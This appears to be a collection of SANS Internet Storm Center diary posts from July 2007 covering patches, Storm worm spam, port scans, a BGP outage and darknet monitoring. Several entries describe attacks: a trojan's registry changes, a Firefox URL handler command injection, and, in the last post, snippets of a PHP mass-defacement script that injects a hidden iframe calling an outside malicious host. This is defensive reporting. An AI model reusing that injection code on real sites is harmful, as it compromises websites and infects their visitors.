Published: 2007-07-12

MS07-040: .NET update trouble

It seems there are a number of readers struggling with the MS07-040 patch for the .NET framework on what appears to be mostly clients.

The reports we got so far seem not to lead to any specific thing that happens in many cases, just various things going haywire. We really do appreciate the heads-up warnings we get from our readers as it allows to write little warnings like this one.

We'd like to offer a double advise at this time:

  • If you run into trouble do call Microsoft and open a case, it's the only way to get attention to the problem from those who know best how to fix it. It should be free. In the US: call 1-866-PCSAFETY, check their website for other countries, support with patches should always be free.
  • Do read through for your specific combination of .NET framework version and you specific OS the relevant KB, some of them were prepared in anticipation of certain problems. They are all linked from KB 931212.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-11

A patchy kind of day

Black Tuesday, Reboot Wednesday, , "lets all distribute patches and vulnerability information Thursday".  We might need to come up with a shorter name. 

We often get links sent to us when vendors release new patches etc.  We don;t publish all of them and typically we let you know about the more important ones.  However this month there just seems to be a swag of patches from a range of vendors.

Microsoft had their usual bunch of patches, Adobe had two which have already been mentioned.  So here are some of the others:

         Cisco

 

iDefense released information on full disclosure and bugtrack (read more here)

Others mentioned today (so far)  CLAM AV, Open office, more on Java, more on tipping point evasion, quicktime (thanks Chris).  We'll also add Symantec and itunes, Juniper  and no doubt more.

In short it is a patchy kind of day, I'd be checking my list of core software and checking to see if I'm on the relevant notification list.  I'll also be checking if there are any non MSFT or Adobe patches I need to apply.

Mark

0 Comments

Published: 2007-07-11

Adobe patches

Like admins have not enough to do on reboot wednesday, Adobe joined in the release of patches today:

APSB07-12 Flash player:
multiple vulnerabilities
CVE-2007-3456
CVE-2007-3457
CVE-2007-2022
 
APSB07-13 Photoshop CS2 and CS3:
multiple file format vulnerabilities
CVE-2007-2244
CVE-2007-2365
Public exploits
available

Enjoy the patching!

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

WinPcap local privilege escalation

An exploit has been made public for a privilege escalation in WinPcap, a DLL used by many security tools.

Even if we agree most systems security professionals would use this on, will typically not have many untrusted users and as such will escape he worst of this. Still, a local escalation and a remote user level exploit combined might be bad enough to get such security systems exploited.

Better be safe than sorry.

WinPcap version 4.0.1 should fix this.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

IE vs. FF

No, I'm not restarting the browser wars. They have been fought and lost.

Let's look at a recently published exploit though:

When Firefox installs on windows, it installs itself as a URL handler. In pseudo code the handler that is added looks like:

FIREFOX.EXE -option "%1"  -option

Now what happens if  %1 contains a double quote?
Right, the attacker gets acces to the command line.

So where does IE come into play against Firefox ?
Firefox seems to prevent access to the command line, but IE happily calls the URL handler and as such provides a path to the command line via the handler installed by Firefox.

As a result the IE user on a machine that has Firefox installed is at risk.

A workaround is to remove the URL handlers installed by Firefox from the registry. I'm sure the developers of Firefox can undo the damage done to systems in a next patch.

This however goes to show that even unused but installed client programs might be a threat on your client system. Hence you need to take care of vulnerabilties in software that you don't even use.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

July 'Black Tuesday' overview

Overview of the July 2007 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS07-036 Multiple vulnerabilities allow remote code execution with the rights of the logged on user.
Replaces MS07-023
Office

CVE-2007-1756
CVE-2007-3029
CVE-2007-3030
KB 936542 No known exploits Critical Critical Important
MS07-037 Input validation failure  allows remote code execution with the rights of the logged on user
Publisher 2007

CVE-2007-1754
KB 936548
No known exploits Important Critical(***) Important
MS07-038 Teredo interfaces bypass certain firewall rules leading to exposure of the system's interfaces and bypass of the perimeter defenses due to the tunneling.
Vista

CVE-2007-3038
KB 935807
No known exploits Moderate Critical Critical(**)
MS07-039 Multiple input validation failures allow remote code execution and DoS.
Active Directory Servers

CVE-2007-3028
CVE-2007-0040
KB 926122 No known exploits Critical Important(**) Critical
MS07-040 Multiple vulnerabilities allow remote code execution on clients and information disclosure on servers.
Replaces MS05-004
.NET framework

CVE-2007-0041
CVE-2007-0042
CVE-2007-0043
KB 931212 No known exploits Critical Critical Critical
MS07-041 Buffer overflow allows remote code execution with system level privileges.
IIS 5.1
(Web server on windows XP)

CVE-2005-4360
KB 939373
DoS exploit public since 2005 Important Critical(***) Critical(***)

 

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): in the event Vista based machines are used as a server, or in the unlikely event Active Directory Services are running on machines used as clients.

(***):If installed.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-09

The ever morphing Storm

Readers has been reporting emails with subjects such as:

  • Spyware Detected!
  • Malware Alert!
  • Virus Detected!

The Storm virus from the last week or so (greeting cards) has morphed into this new version.  Nothing new, the texts has changed somewhat and the subject line is different.  By en large it is still the same attempt to get people to download an exe file.

Auscert has put out an alert on this as there have been an increase of these messages in the region.

As per usual discourage users from blindly clicking links in emails.  Educate them on your corporate AV and AS practices so they will know that the message is not legit and even if you do block all these messages maybe raise awareness with staff so they don't fall for these types of messages at home.  Blocking downloads of exe files is also a good start.

A reader suggested a few keywords and/or phrases that could be used to identify the messages.
robotaccount will be blocked, also look for epidemic near the word worm.

 

Cheers

Mark H - Shearwater

0 Comments

Published: 2007-07-08

Evil Google Ads

Robert sent us some nice analysis earlier today about some hostile ads he discovered at Google.  As best we can tell they are gone now, but here are his findings.

Searching for some free templates at google may bring you nasty things you wont have:

http://www.google.com/search?hl=en&q=kostenlose+vorlagen&btnG=Google+Search

Have a look at the first advertising link "Kostenlos-Vorlagen.info"

All files there (all the same) are detected as:
AntiVir 7.4.0.39 07.07.2007 TR/Spy.BZub.JD.1
F-Secure 6.70.13260.0 07.07.2007 W32/Malware
Ikarus T3.1.1.8 07.07.2007 Trojan-Spy.Win32.Goldun.lw
Kaspersky 4.0.2.24 07.07.2007 Trojan-Spy.Win32.BZub.jd
Microsoft 1.2704 07.07.2007 TrojanDropper:Win32/Small.OT
Norman 5.80.02 07.06.2007 W32/Malware
Sophos 4.19.0 07.06.2007 Mal/Binder-C
Webwasher-Gateway 6.0.1 07.07.2007 Trojan.Spy.BZub.JD.1
After executing, the malware drops a file named:
C:\WINDOWS\System32\ipv6monl.dll
It hooks as a BHO under CLSID:
HKEY_CLASSES_ROOT\CLSID\{36DBC179-A19F-48F2-B16A-6A3E19B42A87} 
\InprocServer32
To do so it looks for activated Brwoser extensions:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 
"Enable Browser Extensions" = yes
It also ensure that the IE could bypass Windows Firewall:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess 
\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
\List "C:\Program Files\Internet Explorer\IEXPLORE.EXE" = C:\Program
Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer
The Keylogger function checks for banking logins end if recognized it logs this information and send it to a server.

Thanks, Robert!  Great job of analysis.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-08

Yahoo Follow-up

On Friday we reported that there were connectivity issues with Yahoo.  Initially we thought that it was a problem either at Yahoo or perhaps inside Verizon's networks based on emails we received.  Later we determined that it was not Verizon or Yahoo, but more likely an issue at Level3.  Yahoo's official response is here.

The first indication we got that the problem was at Level3 was from a post to the NANOG mailing list showing the output of a traceroute to Yahoo.  Here are the last few hops, notice the latency at and beyond Level3:

 13     *       70 ms    77 ms  ge-0-3-0-69.bbr2.sanjose1.level3.net [4.68.18.2]
 14     *       78 ms    71 ms  so-14-0.hsa4.sanjose1.level3.net [4.68.114.158]
 15   487 ms   449 ms   459 ms  hanaro.hsa4.level3.net [4.79.60.22]
 16     *        *        *     Request timed out.
 17     *        *        *     Request timed out.
 18     *      586 ms     *     te-8-1.bas-a2.sp1.yahoo.com [209.131.32.19]
 19     *      570 ms     *     f1.www.vip.sp1.yahoo.com [209.131.36.158]
 20     *        *      591 ms  f1.www.vip.sp1.yahoo.com [209.131.36.158]

Later, one of our readers found that a BGP peer of Level3 was advertising itself as the best path via San Jose for a large number of routes.  The advertisement came from AS9318 (Hanaro Telecom) and caused Yahoo and many other sites that were reached via Level3 to be unavailable for a period of about an hour.  As an example, that reader did a route lookup for www.merit.edu (host of the NANOG mailing list) to show that it wasn't just Yahoo that was affected.  Here is the output provided to the Internet Storm Center:

BGP routing table entry for 198.108.0.0/14 
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #1)
  Not advertised to any peer
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate, best
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1

If the same query is done now, here is what Level3's looking glass service says for www.merit.edu via San Jose:

BGP routing table entry for 198.108.0.0/14
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #2)
Not advertised to any peer
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal, best
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1


Over at Netcraft, you can see the brief outage by observing the red area on the bottom-right side of this status graphic:

So, bottom line - it wasn't Yahoo having the problems.  It was a BGP routing issue that affected reachability of many sites that had routes advertised through Level3.  Unfortunately this is one of the Internet's "dirty little secrets" - BGP updates are the lifeblood of the Internet but yet there are many ways these route advertisements can fail.  There have been many suggestions for improvement (see the soBGP and S-BGP projects) and even the US Department of Homeland Security has tried to get some traction in making improvements to the routing infrastructure.  But the Internet remains vulnerable to these types of configuration errors and intentional false routing advertisements.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-08

Fun with Darknets

When I write Darknet, I mean "a portion of routed, allocated IP space in which no active services or servers reside" not "a private virtual network where users connect only to people they trust."

Every environment is different, so you need to use the architecture to your advantage when placing your darknet sensors.  At one of my clients', they have a unique full-proxied environment where the desktops do not have direct outbound access to the Internet and all non-proxied Internet-bound traffic ends up on their core-routers where it times-out.  By placing a sensor in this loop I can capture all of the traffic initiated from internal clients that is trying to get out to the Internet but is not properly proxied.  This means that I see a lot of misconfigured traffic, but it also means I see all of the botnets trying to phone home. 

In it's initial stages I only had argus and p0f running on the sensor.  The drive would fill up within a week because of the huge amount of misconfigured traffic that was landing on the core-routers, traffic that served no purpose but only to die.  This type of traffic was caused by typos in syslog configs which sent firewall logs off to never-never land, or BOOTP requests intended for decommissioned servers, things of that nature.  After many weeks of working with operations teams we cleared up a lot of the wasted traffic and can now collect full-packet captures via snort for additional analysis.

An external sensor was placed to listen for traffic intended to an internal-only block of IPs.  On this sensor we see what scans are targeting our neighborhood of the Internet,  and backscatter from attacks that spoofs our IP space (for some reason, I only see the APAC region targeted this way.)

I've found that no single tool provides all of the information that I need.  Argus, with its assumptions about flows, doesn't always render backscatter properly and it's difficult to tell when a scan is targeting our network, or if our IP was spoofed to disguise a scan on another network.  Other times, full-packet captures are overkill and p0f logs are all I need to see if a particular scan hit us or not.  No single tool satisfies our requirements (no surprise there.)  I'm still thinking about what I want to use to synthesize all of these data-sources into a more-complete picture.

As a next step, I'm looking into running snort with a very stripped down rule-set (due to the nature of the Darknet, content-based rules are all but useless) to immediately notify our security staff of suspected internal infections (e.g. a SYN sent to establish an IRC connection to a known-malicious host,) and add some visualization via afterglow to see if that adds any capabilities to the analyst.

The Darknet has been very useful in confirming reports sent to the Handlers.  It's paid for itself by helping clean up misconfigured systems and aided in locating unmanaged infected systems on our network.  Darknets are also much safer and easier to justify to management than Honeypots.  So if you're looking for something fun to do at work, give a Darknet a thought.

----------------------------------------------------------------

Kevin Liston (kliston -at- isc.sans.org)

0 Comments

Published: 2007-07-07

Defensive Googling

As cousin Tom reported yesterday, system compromises can become embarrassingly public via Google searches (or what Johnny Long refers to as Googledorks.)

A reader saw Tom's post and sent in his own Google search command that exposes many .gov sites compromised to host porn.

It's not a bad idea to use Google as an Intrusion Detection System-- it's a bit late-notice, but it's better to find out that way than having guys in suits show up at your office to confiscate systems.

Relying on the "site:" syntax you can scan your organizations' web presence for embarrassing exposures.  For example:

site:myorg.org porn

site:mygov.gov cialis buy

To filter that list down you can add additional qualifiers like Tom's filetype:html (or filetype:htm or filetype:asp if you run a Windows shop.)

These are very simple examples, for additional search terms one could examine what people are looking for on Google using:

http://google.com/trends

http://www.google.com/press/zeitgeist.html

You can also skim through your users' proxy logs to see what they're searching for, with the warning that this might not be legal in your region, and what you find most certainly won't be family-friendly.

----------------------------------------------------------------

Kevin Liston (kliston -at- isc.sans.org)

0 Comments

Published: 2007-07-06

Putting the ED in .EDU

So, you're a low-life piece of Internet vermin, and, like all low-life pieces of Internet vermin you find yourself faced with a dilemma: How are you gonna lend an aura of respectability to your scummy online "pharmacy" service?  Better still, how are you going to make your "pharma" site stand out from all the others?  How are you going to "optimize" the search engine placement for your pill slinging service?

What better place from which to push your ED drugs than... well... .edu?

Try this Google search. 

Interestin', eh?

Looks to me like somebody's been doing a mass hack of .edu sites and setting up web pages to push Cialis, Viagra, and... uh... well... porn.

Sex and drugs.  Now all we need is some rock and roll...

----------------------------------------------------------------

Tom Liston : Intelguardians - Handler on Duty

0 Comments

Published: 2007-07-06

Do you want to play a game...?

No... it's not called "Global Thermonuclear War"... although that's a fun game too...

This game is called "What Are the Kidz Doing On Port 5151?"

Lookie here:  http://isc.sans.org/port.html?port=5151

And, to top that off, we've seen peaks of interest in port 5151 in the past:

February, April, and August 2004
April, July, and December 2005
February and September of 2006

To play, simply click here and tell us what you think.  Better still, set up a netcat listener and tell us what you find (or what finds you...)

0 Comments

Published: 2007-07-06

Incoming!!!

In old black and white war movies, just when you're hoping that things will calm down a bit so the hero can kick back with the rest of his platoon, grab a smoke, and relax for a few minutes... some joker yells "Incoming!" and the shelling begins again.  Just how *does* that guy know when the enemy is going to start shooting again?  I really think someone should question his loyalty...

Anyway... in that great tradition, Microsoft announced that next Tuesday's regularly scheduled patch-a-thon will be brought to you by the letter "C" as in "Critical":  Three critical updates (one for Office/Excel, one for the Windows OS, and one for the .NET framework), each one potentially delivering remote code execution goodness right to your desktop.

Accompanying those three will be be a duet of "Important" patches (one for Office/Publisher and one for XP Pro) and a niggling little "Moderate" problem in Vista.

Duck and cover, gang... duck and cover.

0 Comments

Published: 2007-07-06

Yahoo down

A couple of readers alerted us that http://www.yahoo.com appears to be down. At this point, we have no idea why or if this is at all security related. But it does indeed look like Yahoo! is down.

0 Comments

Published: 2007-07-05

Java SE 6.0 Update 2 Released

Java Runtime Environment (JRE) 6.0 Update 2 (as well as all the other variants - JDK, J2SE, etc) has been released.

For more information about the software, please go to java.sun.com/javase/downloads/index.jsp.  The release notes for this update are available at java.sun.com/javase/6/webnotes/ReleaseNotes.html.

0 Comments

Published: 2007-07-05

Odd DNS Traffic

We received a query from one of our readers earlier today asking about some odd DNS traffic that they have been seeing at their site over the last several months.

The traffic is directed at a DNS server that is acting only as a caching server for outbound queries which originate within the local site.  No inbound queries from the Internet are allowed.

The inbound traffic pattern is thus:

1) AN ICMP echo-request is sent to the local DNS server.
2) A UDP DNS query for the root DNS servers is sent to the local DNS server.
3) A UDP PTR query for the IP address of the local DNS server is sent to the local DNS server.
4) Last, a malformed TCP DNS packet is sent to the local DNS server.  This packet has the SYN flag set.

This traffic has come "from" many different sources IP addresses during this time. For a given
 instance of this traffic pattern, the four packets all come from the same source IP address.
If anyone else is seeing traffic like this, we like to hear from you.

0 Comments

Published: 2007-07-04

Port 1433 scanning

Update

A reader suggested that the increased activity on various ports such as 5900, 1433 and some others may be related to the release of the ya bot source code early June, as it includes scans for those ports.  A quick check of the source code confirms the ability and changing the ports seems trivial which may account for the scans to port 5901 mentioned earlier.

------------------------

There has been an increase in activity to port 1433 in the last day or so. 

http://isc.sans.org/port.html?port=1433

As you'll be able to see from the graph it eased off a little bit, but still significantly higher than it has been recently. 

Port 1433 is generally used by MSSQL, if you happen to grab a few packets pass them along please.  If you have the port open and you receive a delivery please pass that along as well.  It would be interesting to see if this is new or not.

With all the activity on the net at the moment you'd think there is a public holiday or something. 
To all those in the US, enjoy the 4th of July.

 

Mark - Shearwater

0 Comments

Published: 2007-07-03

Port 5901 scanning

Will the internet come to a grinding halt on July 4th ? Should we start preparing the first 'crackberry' detox centres? Not really. However, according to media reports something does seem to be amiss. Some outlets have reported on the major increase in port 5901 scanning we're seeing in our (your) logs. This increase is not uncollaborated. Others are reporting very similar increases.

Port 5901 is generally used as the first VNC (Virtual Network Computing) display on Linux machines, and the second one on Windows hosts. There are a number of popular implementations of VNC, of which the most popular are UltraVNC, TightVNC and RealVNC. A number of recent security vulnerabilities have added incentive for attackers to start indexing hosts running this service. In 2006, for example, RealVNC allowed authentication bypass, while UltraVNC was plagued by a number of buffer overflow vulnerabilities.

No reason for panic just yet. It likely indicates attackers may have been succesful in compromising a number of hosts using vulnerabilities in this service, increasing their belief in VNC as a viable attack vector. It could also indicate the release of new attack tools.

As such, if you notice any machines on a network under your control scanning for port 5900 or 5901/TCP, we'd be very interested in hearing what the result of your investigation was. Did you find any new tools, or was it the same old "VNC_bypauth" ? Get in touch with us here. Thanks!

0 Comments

Published: 2007-07-03

Storm worm spreading with new subject lines

We've been receiving numerous mails from readers reporting new subject lines being featured by the Storm Worm. Below is a brief overview of those gathered so far (thanks Michael, Frederic & Robert).

Celebrate Your Independence
Independence Day At The Park
Fourth of July Party
American Pride, On The 4th
God Bless America
Happy B-Day USA
July 4th Family Day
Your Nations Birthday
July 4th B-B-Q Party
Happy 4th July
4th Of July Celebration

0 Comments

Published: 2007-07-03

New mutation of PDF spam

A few weeks ago we reported on new spam using PDF attachments. These were professionally designed and contained graphs and detailed information on the stock in question. In general, they covered one stock on the Frankfurt stock exchange each.

During the last two days, we've received continuous reports of new PDF spam. This time the pages attached are generally of different size each time (no longer A4, but 4x3 inch or 6x1 inch). The text also has been obfuscated which makes it much less readable, but also more difficult for spam filters to assess through OCR.  Stocks mentioned are now listed on NASDAQ instead of the European exchanges.

0 Comments

Published: 2007-07-03

Incident response for the mobile enterprise


A lot of chatter has appeared on the security of Apple’s new iPhone. As with any new technology, it is to be expected that some security issues will be identified and fixed.
 
More importantly though, the phone’s release indicates we as security professionals should be prepared to investigate security incidents on mobile devices. This new generation of smartphones is much more likely to be purchased or requested by employees as a status symbol than is the average laptop. As such, it may be used to transport corporate data and could fall within the scope of a forensic investigation.
 
Unfortunately, mobile phone technology is technically harder to investigate:
 
  • There may not be a clear distinction between which memory space is used for data and which is used for processes. Loss of battery power generally leads to loss of evidence;
  • In most cases you can only acquire data ‘logically’, by requesting it through the phone software. In those rare cases where you can ‘physically’ dump memory as an image, this may still depend on phone functionality that can be ‘flashed’. As such, integrity of evidence could be a serious issue;
  • An attacker could still be able to connect to the device remotely if it is not kept in a shielded environment.
Organizations should therefore take a number of decisions regarding the use of cell phones: one example is whether they should provide employees with cell phones or support a number of acceptable ‘employee-owned phones’ over which they may have less control? Policies should also be developed to govern the use of mobile devices.
 
Incident response groups should commence the first step of the incident handling cycle: Prepare! This includes adding the necessary tools, skills/procedures and hardware to fully support investigations on mobile devices:
 
  • Tools can include free software such as Tulp2g, or one of the many commercial packages. The NIST offers a great tool review for mobile forensics;
  • Skills and procedures can be gathered through training or exercise. One great resource is the NIST site;
  • Hardware should include a SIM/USIM card reader (generally a regular smartcard reader which supports the smaller format), the necessary cables to connect your supported cell phones to the analysis workstation, as well as an RF shielding bag to prevent evidence compromise.

Some other issues may require review with your legal team. Some of the data stored on a SIM/USIM card, for example, some data may allow an investigator to assess broadly the past physical location of a cell phone user. This could be a very significant privacy issue.

--
Maarten Van Horenbeeck

0 Comments

Published: 2007-07-02

iPhone scams

Readers have been reporting new e-mail scams related to the Apple iPhone today.  With a wide variety of new topics to choose from over the weekend, the iPhone apparently came out on top.

One e-mail claims you have ‘won a new iPhone’. Clicking on the link however brings you to a page that attempts to exploit a number of well known Internet Explorer vulnerabilities and then downloads a malicious executable 'sys----.exe'. This executable installs itself as a service and upon review appears to be a spam bot.  Anti virus coverage was very spotty this morning but has improved during the day.  

Another scam aims to convince readers they need to go and buy an iPhone on what appears to be an Apple site (faked using a browser helper object). Naturally the site does not belong to Apple and you end up paying someone in Latvia. Sunbelt has a great writeup on this here. Thanks to roseman for the link.

0 Comments

Published: 2007-07-02

Mass website hosting = mass defacements

Couple of weeks ago we mentioned a large MPack compromise (http://isc.sans.org/diary.html?storyid=2991). As you are probably aware, thousands of web sites (mainly in Italy) have been compromised and iframe tags added that pointed to other sites hosting exploits.

After checking were the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.

One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.

Two things were obvious here:

  • The hosting web server did not have proper security on the file system level. This is, unfortunately, pretty common for (cheap?) hosting servers and is required when PHP is executed as a module in Apache. In this case, the main Apache process must be able to at least read all the files, but it appeared that it was able to write to them as well (wrong file permissions maybe?).
  • The attackers had to find only one vulnerable PHP script on the server (note – the server might have been hosting thousands of different web sites).

Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:

  for ($i = 3; $i < 500; $i++) {
      if ($i == 438) continue;
      flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
      iframe_account(array('/home/sites/site' . $i . '/web'));
  }

From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().

This function takes every director and performs a recursive search for 4 file types:

  $file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “</body>” tag which is replaced with the malicious iframe and properly closed:

  $iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);

And voila – a mass compromise happened.

Conclusion

The main reason why this attack was possible was the fact that Apache’s process must be able to read all files (in order to serve/process them) and that the file system permissions were not correctly set. It remains questionable how many big hosting sites are affected with this (poor) setup.

As far as I know, the only proper way to do this is to run PHP as a CGI program and use chroot and/or suExec with Apache. Only with this you will make sure that one user’s web site can’t affect everyone else on the site. Of course, this has its price in performance which is why some hosting companies decide to sacrifice security instead of buying extra hardware. A nice document describing this setup can be found at http://www.seaoffire.net/fcgi-faq.html

PHP’s safe_mode, despite its name, doesn’t imply that you will have a secure environment. On the contrary, it is possible to work around the safe_mode requirements. This caused so many problems that the PHP developers decided to remove safe_mode from PHP version 6.

So, be sure to check if your hosting company uses chroot and/or suExec because that is the only way to make sure that your own web site will not be compromised by other users sharing the same physical server.

0 Comments